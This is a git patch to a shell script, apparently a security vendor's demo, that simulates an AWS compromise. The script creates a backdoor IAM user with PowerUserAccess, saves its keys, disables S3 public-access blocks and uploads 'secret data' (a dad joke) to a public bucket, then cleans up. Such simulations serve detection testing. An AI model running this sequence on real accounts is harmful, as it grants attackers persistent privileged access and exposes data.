From 879a91aa0b36a0d41520b028e754eac24297b389 Mon Sep 17 00:00:00 2001 From: ipcrm Date: Fri, 13 Oct 2023 09:09:39 -0400 Subject: [PATCH] fix(profile): use different profiles for attacker/created acccount and enable use of AWS_PROFILE --- util/scripts/lw_aws_exploit.sh | 34 ++++++++++++++++++++++------------ 1 file changed, 22 insertions(+), 12 deletions(-) diff --git a/util/scripts/lw_aws_exploit.sh b/util/scripts/lw_aws_exploit.sh index ead7a58..9ad2e0f 100755 --- a/util/scripts/lw_aws_exploit.sh +++ b/util/scripts/lw_aws_exploit.sh @@ -14,7 +14,16 @@ cyn=$'\e[1;36m' end=$'\e[0m' USERNAME=${1:-system} -PROFILE=lacework +PROFILE=${2:-$AWS_PROFILE} +ATTACKER_PROFILE=attack + +if [ -z $PROFILE ]; then + echo "must pass profile as second argument or set AWS_PROFILE before execution" + exit 1 +fi + +# Disabling paging +export AWS_PAGER="" # Create a new IAM user echo "${grn}Creating a new IAM user called ${mag}$USERNAME${end}" @@ -23,43 +32,44 @@ aws iam create-user --user-name $USERNAME --profile $PROFILE | jq aws iam create-access-key --user-name $USERNAME --profile $PROFILE > creds.json echo "" echo "${grn}Granting PowerUser access to ${mag}$USERNAME${end}" -aws iam attach-user-policy --user-name $USERNAME --profile $PROFILE --policy-arn arn:aws:iam::aws:policy/PowerUserAccess +aws iam attach-user-policy --user-name $USERNAME --policy-arn arn:aws:iam::aws:policy/PowerUserAccess --profile $PROFILE export KEY=$(cat creds.json | jq -r .AccessKey.AccessKeyId) export SECRET=$(cat creds.json | jq -r .AccessKey.SecretAccessKey) # Here we start using the new account profile and creds echo "" echo "${grn}Creating a new S3 bucket and uploading a file...${end}" -aws configure set aws_access_key_id "$KEY" --profile $PROFILE -aws configure set aws_secret_access_key "$SECRET" --profile $PROFILE +aws configure set aws_access_key_id "$KEY" --profile $ATTACKER_PROFILE +aws configure set aws_secret_access_key "$SECRET" --profile $ATTACKER_PROFILE + sleep 10 -bucket=$(aws s3api create-bucket --bucket dropbox-$RANDOM --region us-east-1 --object-ownership ObjectWriter --profile $PROFILE | jq -r .Location) +bucket=$(aws s3api create-bucket --bucket dropbox-$RANDOM --region us-east-1 --object-ownership ObjectWriter --profile $ATTACKER_PROFILE | jq -r .Location) bucket=${bucket#/} aws s3api put-public-access-block \ + --profile $ATTACKER_PROFILE \ --bucket $bucket \ - --public-access-block-configuration "BlockPublicAcls=false,IgnorePublicAcls=false,BlockPublicPolicy=false,RestrictPublicBuckets=false" \ - --profile $PROFILE + --public-access-block-configuration "BlockPublicAcls=false,IgnorePublicAcls=false,BlockPublicPolicy=false,RestrictPublicBuckets=false" -aws s3api put-bucket-acl --bucket $bucket --acl public-read --profile $PROFILE +aws s3api put-bucket-acl --bucket $bucket --acl public-read --profile $ATTACKER_PROFILE curl -H "Accept: application/json" https://icanhazdadjoke.com/ > badfile.json echo "" echo "${grn}Uploading secret data...${end}" -aws s3api put-object --acl public-read --bucket $bucket --key badfile.json --body badfile.json --profile $PROFILE +aws s3api put-object --acl public-read --bucket $bucket --key badfile.json --body badfile.json --profile $ATTACKER_PROFILE sleep 10 echo "" echo "${grn}Data uploaded. Preparing to destroy...${end}" sleep 10 echo "${grn}Deleting file and S3 bucket...${end}" -aws s3api delete-object --bucket $bucket --key badfile.json --profile $PROFILE -aws s3api delete-bucket --bucket $bucket --profile $PROFILE +aws s3api delete-object --bucket $bucket --key badfile.json --profile $ATTACKER_PROFILE +aws s3api delete-bucket --bucket $bucket --profile $ATTACKER_PROFILE # Exit back out to our regular context echo "${grn}Cleaning up..." -aws iam detach-user-policy --user-name $USERNAME --profile $PROFILE --policy-arn arn:aws:iam::aws:policy/PowerUserAccess +aws iam detach-user-policy --user-name $USERNAME --policy-arn arn:aws:iam::aws:policy/PowerUserAccess --profile $PROFILE aws iam delete-access-key --access-key-id $KEY --user-name $USERNAME --profile $PROFILE aws iam delete-user --user-name $USERNAME --profile $PROFILE rm creds.json